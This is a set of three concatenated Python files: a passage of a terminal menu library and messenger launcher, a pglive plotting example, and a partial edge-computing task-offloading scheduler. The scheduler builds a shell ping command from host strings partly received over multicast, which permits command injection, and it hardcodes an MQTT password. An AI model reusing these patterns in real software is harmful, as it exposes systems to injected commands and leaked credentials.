print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+entry+tres+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c += 1
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' Description:'+tres+' '*31+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
len_desc1 = 42-len(description[sel][0:40])
len_desc2 = 42-len(description[sel][40:80])
len_desc3 = 42-len(description[sel][80:120])
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][0:40]+tres+' '*len_desc1+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][40:80]+tres+' '*len_desc2+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][80:120]+tres+' '*len_desc3+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'└'+'─'*44+'┘'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
keyboard.read_key(sup)
if keyboard.is_pressed('down'):
sel += 1
if keyboard.is_pressed('up'):
sel -= 1
if keyboard.is_pressed('enter'):
done = True
return sel
os.system('cls')
#print(styl_menu_vert())
def styl_menu_vert_mult(name='ExampleMenu',prompt='Please select one of the following:' , entrys=['Entry 1','Entry 2','Entry 3'],description=['The Entry 1 of the menu. Press ENTER to select it','Lorem Ipsulm','LOL'],backcolor = '\033[44m',menucolor= '\033[47m',selcolor = '\033[100m', sup = False):
selected = []
for object in entrys:
selected.append(False)
namel = len(name)
namelengh = 44-namel
promptl = 43-len(prompt)
done = False
sel = 0
#Colors
tres = '\033[39m'
tblack = '\033[30m'
selv = 0
#lcol = rgb(80,80,80)
lcol = ''
while done == False:
if sel > len(entrys)-1:
sel = len(entrys)-1
if sel < 0:
sel = 0
if selv > 1:
selv = 1
if selv < 0:
selv = 0
print(backcolor+' '*50+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'┌'+'─'*44+'┐'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+name+tres+' '*namelengh+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'├'+'─'*44+'┤'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' '+prompt+'\033[39m'+' '*promptl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c = 0
for object in entrys:
entry = ' '+entrys[c]
if selected[c] == True:
entry = '*'+entrys[c]+'*'
entryl = 42-len(entry)
if sel == c and selv == 0:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+selcolor+tblack+entry+tres+menucolor+' '*entryl+'│'+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+entry+tres+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c += 1
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' Description:'+tres+' '*31+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
len_desc1 = 43-len(description[sel][0:40])
len_desc2 = 43-len(description[sel][40:80])
len_desc3 = 43-len(description[sel][80:120])
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][0:40]+tres+' '*len_desc1+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][40:80]+tres+' '*len_desc2+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][80:120]+tres+' '*len_desc3+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
if selv==1:
print(backcolor+' '*2+menucolor+lcol+'│'+' '*41+selcolor+tblack+'OK'+menucolor+' '+tres+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '*41+tblack+'OK '+tres+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'└'+'─'*44+'┘'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
# Only continue when a key is pressed
x = keyboard.read_key(sup)
if keyboard.is_pressed('down'):
if selv == 0:
sel += 1
if keyboard.is_pressed('up'):
if selv == 0:
sel -= 1
if keyboard.is_pressed('left'):
selv -= 1
if keyboard.is_pressed('right'):
selv += 1
if keyboard.is_pressed('enter'):
if selv == 1:
done = True
return selected
else:
if selected[sel]:
selected[sel] = False
else:
selected[sel] = True
while keyboard.is_pressed(x):
pass
os.system('cls')
#print(styl_menu_vert_mult(entrys=['lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol'],description=['lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol']))
#basic_menu()
def custom_input_menu(name = 'Example Prompt', prompt='Please select one of the following:' , entrys=['Entry 1:','Entry 2:','Entry 3:'], description=['The Entry 1 of the menu. Press ENTER to select it','Lorem Ipsulm','LOL'], sup = False,backcolor = '\033[44m',menucolor= '\033[47m',selcolor = '\033[100m', txt = brgb(171, 171, 171), stxt = brgb(150, 150, 150), default_vals = ['','already something'], space = False):
#nswhitelist = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
#swhitelist = [""]
#blist = str(keyboard.all_modifiers)
c = 0
#print(blist)
#blist = blist.replace('\'', '')
#blist = blist.replace('}', '')
#blist = blist.replace('{', '')
#blist = blist.split(',')
#print(blist)
#c = 0
#for o in blist:
#o = o[0:1].replace(' ', '')+o[1:len(o)]
#blist[c] = o
#c += 1
#print(blist)
#blist.remove('left shift')
#blist.remove('right shift')
#blist.remove('shift')
#print(blist)
if len(entrys)-len(default_vals) > 0:
for i in range(0, len(entrys)-len(default_vals)+1):
default_vals.append('')
inputc = default_vals
for object in entrys:
inputc.append('')
namel = len(name)
namelengh = 44-namel
promptl = 43-len(prompt)
done = False
sel = 0
#Colors
tres = '\033[39m'
tblack = '\033[30m'
#lcol = rgb(80,80,80)
lcol = ''
selv = 0
while done == False:
if sel > len(entrys)-1:
sel = len(entrys)-1
if sel < 0:
sel = 0
if selv > 1:
selv = 1
if selv < 0:
selv = 0
print(backcolor+' '*50+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'┌'+'─'*44+'┐'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+name+'\033[39m'+' '*namelengh+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'├'+'─'*44+'┤'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' '+prompt+'\033[39m'+' '*promptl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c = 0
if space:
print(backcolor+' '*2+menucolor+lcol+'├'+' '*44+'┤'+tres+backcolor+' '*2+'\033[49m')
for object in entrys:
entry = ' '+entrys[c]
entryl = 42-len(entry+' '+inputc[c])-(20-len(inputc[c]))
apl = 20-len(inputc[c])
if sel == c and selv == 0:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+selcolor+tblack+entry+' '+stxt+inputc[c]+' '*apl+tres+menucolor+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+entry+' '+txt+inputc[c]+' '*apl+tres+menucolor+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
if space:
print(backcolor+' '*2+menucolor+lcol+'├'+' '*44+'┤'+tres+backcolor+' '*2+'\033[49m')
c += 1
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' Description:'+tres+' '*31+'│'+tres+backcolor+' '*2+'\033[49m')
len_desc1 = 43-len(description[sel][0:40])
len_desc2 = 43-len(description[sel][40:80])
len_desc3 = 43-len(description[sel][80:120])
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][0:40]+tres+' '*len_desc1+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][40:80]+tres+' '*len_desc2+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][80:120]+tres+' '*len_desc3+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
if selv==1:
print(backcolor+' '*2+menucolor+lcol+'│'+' '*41+selcolor+tblack+'OK'+menucolor+' '+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '*41+tblack+'OK '+tres+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'└'+'─'*44+'┘'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
# Only continue when a key is pressed
#def b(v = '', a = '', b = ''):
# pass
#keyboard.on_release(b, sup)
x = keyboard.normalize_name(keyboard.read_key(sup))
if keyboard.is_pressed('down'):
if selv == 0:
sel += 1
if keyboard.is_pressed('up'):
if selv == 0:
sel -= 1
if keyboard.is_pressed('left'):
selv -= 1
if keyboard.is_pressed('right'):
selv += 1
elif x == 'enter':
if selv == 1:
done = True
return inputc
else:
if selv == 0:
if x == 'backspace':
inputc[sel] = inputc[sel][0:len(inputc[sel])-1]
elif x == 'space' and len(inputc[sel]) < 20:
inputc[sel] = inputc[sel]+' '
elif x in ["strg","ctrl","shift","umschalt","enter","nach-oben","nach-unten","nach-rechts","nach-links","up","down","left","right"]:
pass
elif len(inputc[sel]) < 20:
inputc[sel] = inputc[sel]+x
#def x(x):
# pass
#keyboard.on_release(x)
while keyboard.is_pressed(x):
pass
os.system('cls')
# Prompt
def prompt(name='ExampleMenu', text = 'This is and A or B Prompt. Select the Button thith the ARRow key and hit enter', abut = 'Cancle', bbut = 'OK', sup = False,backcolor = '\033[44m',menucolor= '\033[47m',selcolor = '\033[100m'):
namel = len(name)
namelengh = 44-namel
promptl = 43-len(text)
done = False
sel = 0
#Colors
tres = '\033[39m'
tblack = '\033[30m'
#lcol = rgb(80,80,80)
lcol = ''
while done == False:
if sel > 1:
sel = 1
if sel < 0:
sel = 0
len_desc1 = 42-len(text[0:40])
len_desc2 = 42-len(text[40:80])
len_desc3 = 42-len(text[80:120])
blen = 42-(len(abut)+len(bbut))
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
print(backcolor+' '*2+menucolor+lcol+'┌'+tblack+name+tres+'\033[39m'+'─'*namelengh+lcol+'┐'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+text[0:40]+tres+' '*len_desc1+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+text[40:80]+tres+' '*len_desc2+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+text[80:120]+tres+' '*len_desc3+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
if sel == 0:
print(backcolor+' '*2+menucolor+lcol+'│ '+selcolor+tblack+abut+tres+menucolor+' '*blen+tblack+bbut+tres+lcol+' │'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│ '+tres+tblack+abut+tres+' '*blen+tblack+selcolor+bbut+tres+menucolor+lcol+' │'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'└'+'─'*44+'┘'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
x = keyboard.read_key(sup)
if keyboard.is_pressed('left'):
sel -= 1
if keyboard.is_pressed('right'):
sel += 1
if keyboard.is_pressed('enter'):
done = True
return sel
while keyboard.is_pressed(x):
pass
os.system('cls')
# LOL
# Ask for Server Listserver or Client
pts = smenu.styl_menu_vert(name = 'JuNi\'s Messenger', entrys=['Client', 'Server', 'List Server'], description= ['Starts the Client of the Messenger to recive and send Messenges.', 'Starts the Server for the Messenger in order for clients to send messages to each other.', 'Starts the List Server wich is a server list host as the name suggest and it\'s good forlisting servers and theire IP\'s.'])
# Client Route
if pts == 0:
serveri = smenu.custom_input_menu(name='Messenger', entrys=['Server IP:', 'Server P:'], prompt = 'Please anwer the questions below:', default_vals=['','4242'], description=['The IP of the server you want to connect to.', 'The Port of the server you want to connect to. Leave as it is if you don\'t have a port.'])
usrcrd = smenu.custom_input_menu(name='Messenger', entrys=['User Name:', 'Password: '], prompt = 'Please anwer the questions below:', default_vals=[os.getlogin(),''], description=['Your User Name that will be displayed on the Server','The Password for the Server, Leave blank if you don\'t need it.'])
if 'Windows' in platform.system():
batfile = smenu.prompt(name='Messenger',text='Do You Wan\'t to Create a Batch file? This can later be used to Quickly start the messenger with youre settings wich you just entered', abut='No', bbut='Yes')
else:
batfile = smenu.prompt(name='Messenger',text='Do You Wan\'t to Create a Bash file? This can later be used to Quickly start the messenger with youre settings wich you just entered', abut='No', bbut='Yes')
# Get Vars set up
server_IP= serveri[0]
server_P = serveri[1]
usrn = usrcrd[0]
if not usrcrd[1] == '':
batpw = ' -pw '+ usrcrd[1]
pw = usrcrd[0]
else:
batpw = ''
pw = ''
if batfile == 1:
batfname = smenu.custom_input_menu(name='Messenger', entrys=['File Name:'], prompt = 'Please input the File Name:', default_vals=[os.getlogin()+'\'s_messenger'], description=['The name of the Messenger "Profile" File.'])
if 'Windows' in platform.system():
f = open('C:\\Users\\'+os.getlogin()+'\\Desktop\\'+batfname[0]+'.bat', 'w')
f.write('python '+os.path.dirname(os.path.realpath(__file__))+'\\'+pathlib.Path(__file__).name+' -c -ip '+server_IP+' -p '+server_P+' -u '+usrn+batpw)
f.close()
else:
f = open(os.path.dirname(os.path.realpath(__file__))+batfname[0]+'.sh', 'w')
f.write('#!/bin/bash\npython3 '+os.path.dirname(os.path.realpath(__file__))+'/'+pathlib.Path(__file__).name+' -c -ip '+server_IP+' -p '+server_P+' -u '+usrn+batpw)
f.close()
# Server Route
if pts == 1:
srvcrd = smenu.custom_input_menu(name='Messenger Server', entrys=['Server Port: ', 'Server Password:'], prompt = 'Please answer the questions below:', default_vals=['4242',''], description=['The Server Port that the clients will connect to','The Password for the Server, Leave blank if you don\'t wan\'t one. Every Client has to enter this'])
if smenu.prompt(name='Messenger Server',text='Do You wan\'t to enable Server Listing. This will send some information to the List server so your serve will be easesar to find. (No Listing Of PW or USRNs)', abut='No', bbut='Yes') == 1:
pass
else:
sls = ''
# List Server Route
|
update_rate.py
|
import pglive.examples_pyqt6 as examples
from math import ceil
from threading import Thread
import pyqtgraph as pg
from pglive.sources.data_connector import DataConnector
from pglive.sources.live_plot import LiveHBarPlot
from pglive.sources.live_plot_widget import LivePlotWidget
"""
In this example, different update rate is demonstrated.
Display four plots, each slower by 1/4 of previous update rate.
Update rate is set in Hz unit.
"""
layout = pg.LayoutWidget()
args = []
# Initial rate of 100Hz
update_rate = 100
max_len = 600
# Initial delta Y is 1
bar_height = 1
for index in range(4):
widget = LivePlotWidget(title=f"Horizontal Bar Plot @ {update_rate}Hz")
plot = LiveHBarPlot(bar_height=bar_height, brush="green", pen="green")
widget.addItem(plot)
layout.addWidget(widget)
args.append(DataConnector(plot, max_points=ceil(max_len), update_rate=update_rate))
# divide all important parameters by 4
update_rate /= 4
max_len /= 4
# bar height depends on Y distance, that's why we should multiply it by 4
# if we leave it at 1, we get smaller bars
bar_height *= 4
layout.show()
Thread(target=examples.sin_wave_generator, args=args).start()
examples.app.exec()
examples.stop()
|
algo_two.py
|
from functools import reduce
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
import logging
current_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(current_path)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s:%(message)s')
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
# cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
cmd = ['ifconfig ens4 | grep inet | head -n 1 | cut -d "t" -f 2 | cut -d " " -f 2']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# logger.info("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
logger.info('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
logger.info('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
total_received_task = 0
def edf():
global total_received_task
t_lcm = lcm([tasks[i]['period'] for i in tasks])
t_dead = {i: tasks[i]['deadline'] for i in tasks}
sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
# logger.info(sorted_dead)
ready_task = []
for i in sorted_dead:
period = tasks[i[0]]['period']
# logger.info('lcm: ', t_lcm, ' period: ', period)
t_range = int(t_lcm / period)
last_dead = 0
for j in range(t_range):
ready_task.append((i[0], last_dead + tasks[i[0]]['deadline']))
last_dead += period
ready_task = sorted(ready_task, key=lambda t: t[1])
logger.info(str(ready_task))
t_time_ = 0
schedule = []
missed = []
register = {i: 0 for i in tasks.keys()} # {ti : amount executed}
for i in ready_task:
if (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
while (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
t_time_ += 1
# schedule.append(('idle', t_time))
if (t_time_ // tasks[i[0]]['period']) + 1 > register[i[0]]:
if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
register[i[0]] += 1
t_time_ += tasks[i[0]]['wcet']
schedule.append(i[0])
else:
logger.info(f'Deadline missed: {i}')
missed.append(i[0])
# logger.info('s : ', schedule)
# logger.info('r: ', register)
if len(missed) > 0:
# logger.info('missed deadline: ', missed)
cooperative_mec(missed)
_edf_ = task_time_map(schedule, tasks)
total_received_task += len(_edf_)
return _edf_
# generate execution sequence
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check if for all resources
# of current P need is less
# than work
for j in range(res):
if need[t][j] > work[j]:
break
# If all needs of p were satisfied.
if j == res - 1:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
logger.info("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
# logger.info('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
logger.info(f'offloading tasks: {offload}')
cooperative_mec(offload)
deadlock[0] += 1
logger.info(f'safe seq: {safe_seq}')
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# logger.info('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
logger.info(f'Execution time comparison:= {checking_times}')
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
logger.info('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
logger.info(str(e))
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
logger.info('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# logger.info('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
logger.info('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
